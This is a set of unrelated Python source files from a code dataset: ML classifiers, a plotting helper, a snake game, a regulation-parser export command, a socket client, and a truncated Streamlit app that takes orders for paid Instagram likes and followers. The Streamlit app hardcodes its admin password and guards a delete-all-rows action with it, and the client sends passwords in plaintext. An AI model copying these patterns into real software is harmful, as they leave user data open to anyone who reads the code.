confusion_matrix(test_labels, clf.predict(test_images))\n return ans, cm\n\n\ndef train_knn_classifier(training_images, training_labels, test_images, test_labels):\n knn = KNeighborsClassifier(n_neighbors=6).fit(training_images, training_labels)\n accuracy = knn.score(test_images, test_labels)\n # print(knn.predict(test_images))\n #knn_predictions = knn.predict(test_images)\n #cm = confusion_matrix(test_images, knn_predictions)\n\n return accuracy#, cm\n\n\ndef train_naive_bayes(training_images, training_labels, test_images, test_labels):\n gnb = GaussianNB().fit(training_images, training_labels)\n #gnb_predictions = gnb.predict(tes)\n accuracy = gnb.score(test_images, test_labels)\n #cm = confusion_matrix(y_test, gnb_predictions)\n return accuracy\n\n\ndef train_mlp(training_images, training_labels, test_images, test_labels):\n\n clf = MLPClassifier(hidden_layer_sizes=(50,50,50), activation='logistic', alpha=1, learning_rate='constant', solver='adam')\n clf.fit(training_images, training_labels)\n ans = clf.score(test_images, test_labels)\n # print(clf.predict(test_images))\n # confusion_matrix(test_labels, clf.predict(test_labels))\n return ans\n\n\ndef mlp_param_selection(X, y, nfolds):\n parameter_space = {\n # 'hidden_layer_sizes': [(50, 50, 50), (50, 100, 50), (100,), (100,100,100)],\n 'hidden_layer_sizes': [(50, 50, 50)],\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'solver': ['lbfgs', 'adam', 'sgd'],\n 'alpha': [1, 0.1, 0.01, 0.001],\n 'learning_rate': ['constant', 'adaptive', 'invscaling'],\n }\n mlp = MLPClassifier()\n grid_search = GridSearchCV(mlp, parameter_space, n_jobs=-1, cv=nfolds)\n grid_search.fit(X, y)\n\n return grid_search.best_params_\n\n\n#######################################\n\n\n#######################################\n\n\n#######################################\n\ndef main():\n np.set_printoptions(threshold=np.inf)\n a,b,c,d,e,f = get_data(get_images(),get_labels())\n # inspect(a,b,c,d,e,f)\n print(contruct_cnn(6,a,b,c,d,e,f))\n print(get_statistacs(\"cnnmodel1.h5py\",a,b,c,d,e,f,6))\n # print(train_decision_tree(a,b,c,d))\n # print(train_knn_classifier(a,b,c,d))\n # print(train_naive_bayes(a,b,c,d))\n # print(train_mlp(a,b,c,d))\n # print(mlp_param_selection(c,d,2))\n # print(get_labels())\n\nif __name__ == '__main__':\n main()\n", "sub_path": "haircolour.py", "file_name": "haircolour.py", "file_ext": "py", "file_size_in_byte": 7162, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.ndarray", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 24, "usage_type": "name"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 36, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "cnn.build", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 128, "usage_type": "name"}, {"api_name": "sklearn.metrics", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 134, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 148, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 212, "usage_type": "attribute"}]} +{"seq_id": "278855044", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom funcs import month_to_str\nfrom PIL import Image\n\n\ndef draw_picture(day, data, month, key):\n if key == 1:\n type = \"average\"\n if key == 2:\n type = \"max\"\n if key == 3:\n type = \"min\"\n\n month = month_to_str(month)\n\n # 見やすため\n y_max = np.amax(data) + 5\n y_min = np.amin(data) - 5\n\n title = \"The \" + type + \" temperature of Okayama in \" + month\n plt.title(title)\n plt.xlabel(\"date\")\n plt.ylabel(\"temperature\")\n\n plt.ylim(y_min, y_max)\n\n plt.plot(day, data, '^', day, data)\n\n save_path = \"./output/\"\n save_name = save_path + month + \"_\" + type + \".png\"\n plt.savefig(save_name, dpi=120, format='png')\n\n # plt.show() # pyqt5と連携するときに、バグがある\n\n image = Image.open(save_name)\n image.show()\n", "sub_path": "printout.py", "file_name": "printout.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "funcs.month_to_str", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "495309864", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 18 15:41:47 2016\n\n@author: EBianco\n\"\"\"\n\nfrom datetime import datetime\n\n\ndef solve(d1, d2, f):\n print(datetime.strptime(d2, f) - datetime.strptime(d1, f))\n\n'#5a'\ndate_start_a = '01-02-2013'\ndate_stop_a = '07-28-2015'\nform_a = '%m-%d-%Y'\n\nsolve(date_start_a, date_stop_a, form_a)\n\n\n'#5b'\ndate_start_b = '12312013'\ndate_stop_b = '05282015'\nform_b = '%m%d%Y'\n\nsolve(date_start_b, date_stop_b, form_b)\n\n\n'#5c'\ndate_start_c = '15-Jan-1994'\ndate_stop_c = '14-Jul-2015'\nform_c = '%d-%b-%Y'\n\nsolve(date_start_c, date_stop_c, form_c)\n\n\n\n\n\n\n\n\n\n", "sub_path": "5/q5_datetime.py", "file_name": "q5_datetime.py", "file_ext": "py", "file_size_in_byte": 583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "591599648", "text": "import pygame\nimport time\n\nclass gameScreen:\n def __init__(self, gameDisplay):\n self.gameDisplay = gameDisplay\n self.gameScreenWidth = self.gameDisplay.get_width()\n self.gameScreenHeight = self.gameDisplay.get_height() -30\n\n def mapUpdate(self, appleX, appleY, snake):#opravit ked nabura\n gameMap = [[0 for _ in range((int)(self.gameScreenHeight / 10))]\n for _ in range((int)(self.gameScreenWidth / 10))]\n\n #for i in range(0, len(gameMap)):#steny\n # gameMap[0][i]= 3\n # gameMap[i][0] = 3\n # gameMap[len(gameMap)-1][i] = 3\n # gameMap[i][len(gameMap)-1] = 3\n # for i in range(0, int(len(gameMap) / 2)):\n # gameMap[int(len(gameMap)/4)+ i][int(len(gameMap)/2)] = 4\n # gameMap[int(len(gameMap) / 2)][int(len(gameMap)/4) +i] = 4\n\n\n for i in range(1, len(snake)):\n gameMap[(int)(snake[i][1]/10)][(int)(snake[i][0]/10)] = 3#telo hada\n\n gameMap[(int)(snake[0][1] / 10)][(int)(snake[0][0] / 10)] = 2#hlava hada\n\n gameMap[(int)(appleY / 10)][(int)(appleX / 10)] = 1#jedlo\n\n return gameMap\n\n def mapPrint(self, gameMap):\n toDisplay = \"\"\n for i in range(0, len(gameMap)):\n for j in range(0, len(gameMap)):\n toDisplay+=(str)(gameMap[i][j])\n toDisplay+='\\n'\n print (toDisplay)\n\n def textObjects(self, text, font):\n textSurface = font.render(text, True, (255, 255, 255))\n return textSurface, textSurface.get_rect()\n\n def messageDisplay(self, text):\n largeText = pygame.font.Font('freesansbold.ttf', int(30 / 2))\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (self.gameScreenWidth * 3/4, self.gameScreenHeight + 30 /2)\n self.gameDisplay.blit(TextSurf, TextRect)\n\n def gameScreenDisplay(self, score):\n pygame.draw.line(self.gameDisplay, (255, 255, 255), (0, self.gameScreenHeight),\n (self.gameScreenWidth, self.gameScreenHeight))\n text = 'Score: ' + str(score)\n largeText = pygame.font.Font('freesansbold.ttf', 20)\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (\n self.gameScreenWidth * 3 / 4, self.gameScreenHeight + 10)\n self.gameDisplay.blit(TextSurf, TextRect)\n\n def messageCrashed(self, text):\n largeText = pygame.font.Font('freesansbold.ttf', int(self.gameScreenWidth / 10))\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (self.gameScreenWidth / 2, self.gameScreenHeight / 2)\n self.gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n time.sleep(2)\n\n def displayWalls(self, gamemap):\n for i in range(0, len(gamemap)):\n for j in range(0, len(gamemap)):\n if gamemap[j][i] == 4:\n pygame.draw.rect(self.gameDisplay, (255, 255, 255), (i*10, j*10, 10, 10))\n\n", "sub_path": "gameScreen.py", "file_name": "gameScreen.py", "file_ext": "py", "file_size_in_byte": 2989, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygame.font.Font", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "96940572", "text": "import click\n\nfrom regparser.api_writer import Client\nfrom regparser.index import entry\n\n\n# The write process is split into a set of functions, each responsible for\n# writing a particular type of entity\n\ndef write_trees(client, cfr_title, cfr_part):\n tree_dir = entry.Tree(cfr_title, cfr_part)\n for version_id in entry.Version(cfr_title, cfr_part):\n if version_id in tree_dir:\n click.echo(\"Writing tree \" + version_id)\n tree = (tree_dir / version_id).read()\n client.regulation(cfr_part, version_id).write(tree)\n\n\ndef write_layers(client, cfr_title, cfr_part):\n for version_id in entry.Version(cfr_title, cfr_part):\n layer_dir = entry.Layer(cfr_title, cfr_part, version_id)\n for layer_name in layer_dir:\n click.echo(\"Writing layer {}@{}\".format(layer_name, version_id))\n layer = (layer_dir / layer_name).read()\n client.layer(layer_name, cfr_part, version_id).write(layer)\n\n\ndef write_notices(client, cfr_title, cfr_part):\n sxs_dir = entry.SxS()\n for version_id in entry.Version(cfr_title, cfr_part):\n if version_id in sxs_dir:\n click.echo(\"Writing notice \" + version_id)\n tree = (sxs_dir / version_id).read()\n client.notice(version_id).write(tree)\n\n\ndef write_diffs(client, cfr_title, cfr_part):\n diff_dir = entry.Diff(cfr_title, cfr_part)\n version_ids = list(entry.Version(cfr_title, cfr_part))\n for lhs_id in version_ids:\n container = diff_dir / lhs_id\n for rhs_id in version_ids:\n if rhs_id in container:\n click.echo(\"Writing diff {} to {}\".format(lhs_id, rhs_id))\n diff = (container / rhs_id).read()\n client.diff(cfr_part, lhs_id, rhs_id).write(diff)\n\n\n@click.command()\n@click.argument('cfr_title', type=int)\n@click.argument('cfr_part', type=int)\n@click.argument('output')\ndef write_to(cfr_title, cfr_part, output):\n \"\"\"Export data. Sends all data in the index to an external source.\n\n \\b\n OUTPUT can be a\n * directory (if it does not exist, it will be created)\n * uri (the base url of an instance of regulations-core)\n * a directory prefixed with \"git://\". This will export to a git\n repository\"\"\"\n client = Client(output)\n cfr_part = str(cfr_part)\n write_trees(client, cfr_title, cfr_part)\n write_layers(client, cfr_title, cfr_part)\n write_notices(client, cfr_title, cfr_part)\n write_diffs(client, cfr_title, cfr_part)\n", "sub_path": "regparser/commands/write_to.py", "file_name": "write_to.py", "file_ext": "py", "file_size_in_byte": 2486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "regparser.index.entry.Tree", "line_number": 11, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 11, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 12, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 12, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 14, "usage_type": "call"}, {"api_name": "regparser.index.entry.Version", "line_number": 20, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 20, "usage_type": "name"}, {"api_name": "regparser.index.entry.Layer", "line_number": 21, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 21, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 23, "usage_type": "call"}, {"api_name": "regparser.index.entry.SxS", "line_number": 29, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 29, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 30, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 30, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 32, "usage_type": "call"}, {"api_name": "regparser.index.entry.Diff", "line_number": 38, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 38, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 39, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 39, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 44, "usage_type": "call"}, {"api_name": "regparser.api_writer.Client", "line_number": 62, "usage_type": "call"}, {"api_name": "click.command", "line_number": 49, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 50, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 51, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "266314380", "text": "\"\"\"All the functions that a user can perform.\r\n The client object gets instantiated and used in ui.py\"\"\"\r\n\r\nimport socket\r\nimport json\r\n\r\nclass Client:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Creates a socket for the client, connects to server\r\n \"\"\"\r\n\r\n host = 'localhost'\r\n port = 8787\r\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n self.sock.connect((host,port))\r\n\r\n def login(self, username, pword):\r\n \"\"\"\r\n Logs the user in once connected to the server\r\n\r\n :param username: user's name\r\n :param pword: user's password\r\n\r\n :return: 0 if username doesn't exist or incorrect password OR\r\n 1 if username exists and enters correct password\r\n \"\"\"\r\n\r\n # serialize the username and pword into json\r\n info = json.dumps({'type': 'login',\r\n 'username': username,\r\n 'pword': pword})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # wait for response\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n\r\n def register(self, username, pword):\r\n '''\r\n Registers a new user\r\n\r\n :param username: new user name\r\n :param pword: new user password (encrypyted)\r\n\r\n :return: 0 if username is not unique (can't have duplicate usernames)\r\n 1 if username is unique and user is put in db\r\n '''\r\n\r\n # serialize the username and pword into json\r\n info = json.dumps({'type': 'register',\r\n 'username': username,\r\n 'pword': pword})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # wait for response\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n\r\n def upload(self, fileName, category, keywords):\r\n \"\"\"\r\n Asks the data_retriever to upload a file to the db\r\n\r\n :param fileName: name of new file (file is stored on user's computer)\r\n :param category: file category\r\n :param: keywords: file keywords\r\n\r\n :return: 0 if upload is not successful\r\n 1 if upload is successful\r\n\r\n \"\"\"\r\n\r\n # initial msg\r\n info = json.dumps({'type': 'upload',\r\n 'user': self.name,\r\n 'name': fileName,\r\n 'category': category,\r\n 'keywords': keywords})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # server tells client to send the file if name is unique\r\n if self.sock.recv(1024).decode() == '1':\r\n # get contents of file\r\n\r\n \r\n file = open(fileName, \"rb\")\r\n\r\n #break file down into 1024 byte chunks\r\n chunk = file.read(1024)\r\n #added the following short loop, if what I read is right this should help send the full file and then end the file with the shutdown method call\r\n while (chunk):\r\n self.sock.send(chunk)\r\n chunk = file.read(1024)\r\n file.close()\r\n \r\n\r\n # TODO: PROTOCOL FOR END OF FILE (currently only sends first 1024 bytes)\r\n # TODO: HAVE TO NOTIFY DATA RETRIEVER WHEN FILE IS DONE\r\n\r\n #send chunks of file\r\n # while (chunk):\r\n # self.sock.send(chunk)\r\n # chunk = file.read(1024)\r\n\r\n # 1 = EOF\r\n # self.sock.send('1'.encode())\r\n\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n \r\n\r\n def search(self, fileName):\r\n \"\"\"\r\n Asks the data_retriever to search an existing file in the db\r\n\r\n :param fileName: name of file\r\n\r\n :return: contents of file, or an error msg if file doesn't exist\r\n \"\"\"\r\n\r\n def edit(self, fileName, newFile):\r\n \"\"\"\r\n Asks the data_retriever to replace content of a file\r\n\r\n :param fileName: name of existing file\r\n :param newFile: content that will replace fileName's content\r\n\r\n :return: relays the data_retriever's msg\r\n \"\"\"\r\n", "sub_path": "KnowledgeManagement/Client/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 4138, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "socket.socket", "line_number": 16, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 16, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 53, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "157181880", "text": "import streamlit as st\nimport sqlite3\nimport pandas as pd\n\ncon=sqlite3.connect(\"bismillah.db\")\nc=con.cursor()\n\n\n\ndef create_usertable():\n\tc.execute(\"CREATE TABLE IF NOT EXISTS user_table3(id integer primary key autoincrement, instalink Text NOT NULL,plan text NOT NULL,ph_no text NOT NULL,status text)\")\n\t\n\ndef add_userdata(instalink,plan,ph_no,stats):\n\tc.execute(\"INSERT INTO user_table3(instalink,plan,ph_no,status) VALUES(?,?,?,?)\",(instalink,plan,ph_no,stats))\n\tcon.commit()\n\ndef view_link_plan():\n\tc.execute(\"Select instalink as Instagram_Link,plan as Selected_Plan from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_plan_phno():\n\tc.execute(\"Select plan as Selected_Plan,ph_no as Phone_Number from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_phno_link():\n\tc.execute(\"Select instalink as Instagram_Link,ph_no as Phone_Number from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef delete_table():\n\tc.execute(\"DROP TABLE user_table3\")\n\t\ndef view_instalink():\n\tc.execute(\"Select id,instalink,status from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef view_plan():\n\tc.execute(\"Select id,plan,status from user_table3\")\n\tdata=c.fetchall()\n\treturn data\ndef change_status(status,row_id):\n\tc.execute(\"update user_table3 set status=? where id =?\",(status,row_id))\n\tcon.commit()\ndef give_id(plan,ph_no):\n\tc.execute(\"SELECT id FROM user_table3 where plan = ? and ph_no = ? ORDER BY id DESC LIMIT 3\",(plan,ph_no))\n\tdata=c.fetchall()\n\treturn data\ndef view_status(row_idd):\n\tc.execute(\"Select status from user_table3 where id=?\",(row_idd,))\n\tdata=c.fetchall()\n\treturn data\n\n\n\n\n#----------------------------------------\n\n\n\ndef insta_link(a,b,c):\n\n\tif c ==1 :\n\t\tst.subheader(\"4. Enter your Instagram ID\")\n\t\tlink=\"a\"\n\t\tif st.checkbox(\"How to find my Instagram ID?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select ID\n\t\t\t\n\t To get a link to a post in Android and ios:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id on top of Edit Profie option.\n\t To get a link to a post from the web:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id which is on Left side of Edit Profie option.\n\t\t\t\"\"\")\t\n\t\tlink=st.text_input(\"Copy and paste the ID below\",\"\")\n\t\tst.info(\"Make sure your ID is correct and exact\")\n\t\tst.success(\"We are paying for you, So it is free. Please share it with your friends\")\t\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click here, We paid for you\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"We are paying for you, So it is free. Please share it with your friends\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your payment\")\n\t\t\t\t#st.warning(\"\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\n\n\n\telif c==0:\n\t\t\n\t\tst.subheader(\"4. Enter your Instagram Post link\")\n\t\tif st.checkbox(\"How to find my Instagram Link?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select link\t\n\t\t\t\n\t To get a link to a post in Android and ios:\n\t 1.Tap ...(Three dots) above the post.\n\t 2.Tap Copy Link.\n\t To get a link to a post from the web:\n\t 1.Open your web browser.\n\t 2.Go to instagram.com/username. For example, if the username is \"johnsmith,\" type in instagram.com/johnsmith as the URL.\n\t 3.Click the post you want to save and copy the link at the top of your browser.\n\t\t\t\"\"\")\n\t\tlink=\"a\"\t\n\t\tlink=st.text_input(\"\")\n\t\tst.info(\"Make sure your link is correct\")\n\t\t#st.subheader(\"\")\n\t\t#st.subheader(\"\")\n\t\t#st.success(\" - 9493736321@okbizaxis \".format(a))\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click Here to submit\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"\"\"\n\n\t\t\t Send money using Google pay, Phone Pe, Paytm to this Number with Order ID(Mentioned below) as remarks\t\n\t\t\t\n\t 9493736321\n\n\t\t\t \"\"\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your paymemt\")\n\t\t\t\t#st.warning(\"Your Request will be processed in less than 1 hr\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\n\telse:\n\t\t\n\t\tst.subheader(\"4. Enter your Instagram ID\")\n\t\tlink=\"a\"\n\t\tif st.checkbox(\"How to find my Instagram ID?\"):\n\t\t\tst.info(\"\"\"\n\t\t\tFollow these steps regarding how to select ID\n\t\t\t\n\t To get Instagram ID in Android and ios:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id on top of Edit Profie option.\n\t To get Instagram ID from the web:\n\t 1.Go to Profile.\n\t 2.Select Instagram Id which is on Left side of Edit Profie option.\n\t\t\t\"\"\")\t\n\t\tlink=st.text_input(\"Copy and paste the ID below\",\"\")\n\t\tst.info(\"Make sure your ID is correct and exact\")\n\t\t#st.subheader(\"\")\n\t\tst.subheader(\"\")\n\t\tif st.button(\"Click here and send the money\"):\n\t\t\tif len(link) > 0 and len(b) ==10:\n\t\t\t\tcreate_usertable()\n\t\t\t\tadd_userdata(link,a,b,\"Processing\")\n\t\t\t\tst.write(\"You have completed it in just 4 Steps\")\n\t\t\t\tpayout=\"\"\"\n\t\t\t\t
\n\t\t\t\t

Payment

\n\t\t\t\t
\n\t\t\t\t\"\"\"\n\t\t\t\tst.markdown(payout,unsafe_allow_html=True)\n\t\t\t\tst.warning(\"Your chosen plan is {}\".format(a))\n\t\t\t\tst.success(\"\"\"\n\n\t\t\t Send money using Google pay, Phone Pe, Paytm to this Number with Order ID(Mentioned below) as remarks/message\t\n\t\t\t\n\t 9493736321\n\n\t\t\t \"\"\")\n\t\t\t\tlis=give_id(a,b)\n\t\t\t\ttup=lis[0]\n\t\t\t\tst.write(\"You can track your order status with this id -> \",tup[0])\n\t\t\t\tst.subheader(\"\")\n\t\t\t\tst.warning(\"Your Request will be processed in less than 1 hr after your payment\")\n\t\t\t\t#st.warning(\"Your Request will be processed in less than 1 hr\")\n\t\t\telse:\n\t\t\t\tst.warning(\"Fields are missing\")\t\t\t\n\ndef admin():\n\tst.write(\"You are in admin page now\")\n\tst.warning(\"This page is for Admin\")\n\tst.info(\"If you are user, please select Normal user option to use this website\")\n\ta=st.text_input(\"Username\",\"admin\")\n\tb=st.text_input(\"Password\",\"\",type=\"password\")\n\tif a == \"admin\" and (b==\"insta\" or b == \"Insta\"):\n\t\tst.success(\"You logged in as admin\")\n\t\tst.subheader(\"What do you want to view\")\n\t\ts=st.selectbox(\"\",[\"Plan and Phone number\",\"Instagram Link and Plan\",\"Instagram Link and Phone Number\",\"Instagram Link\",\"Plan\"])\n\t\tif s == \"Plan and Phone number\":\n\t\t\tdata=view_plan_phno()\n\t\t\tdf=pd.DataFrame(data)\n\t\t\tdf_new = df.rename(columns={'0': 'Selected_Plan','1':'Phone_Number'})\n\t\t\tst.dataframe(df_new)\n\n\t\telif s == \"Instagram Link and Plan\":\n\t\t\tdata=view_link_plan()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Instagram Link and Phone Number\":\n\t\t\tdata=view_phno_link()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Instagram Link\":\n\t\t\tdata=view_instalink()\n\t\t\tst.dataframe(data)\n\t\telif s== \"Plan\":\n\t\t\tdata=view_plan()\n\t\t\tst.dataframe(data)\n\t\tif st.button(\"Delete All Rows\"):\n\t\t\tdelete_table()\t\n\t\tst.subheader(\"Dear, Admin Update enter user id and click success after transaction\")\n\t\trow_id=st.text_input(\"Enter the ID you have completed(Exactly)\")\n\t\tif st.button(\"Success\"):\n\t\t\tchange_status(\"Success\",row_id)\n\n\t\t\t\n\t\tst.subheader(\"Dear, Admin These are the Links to the 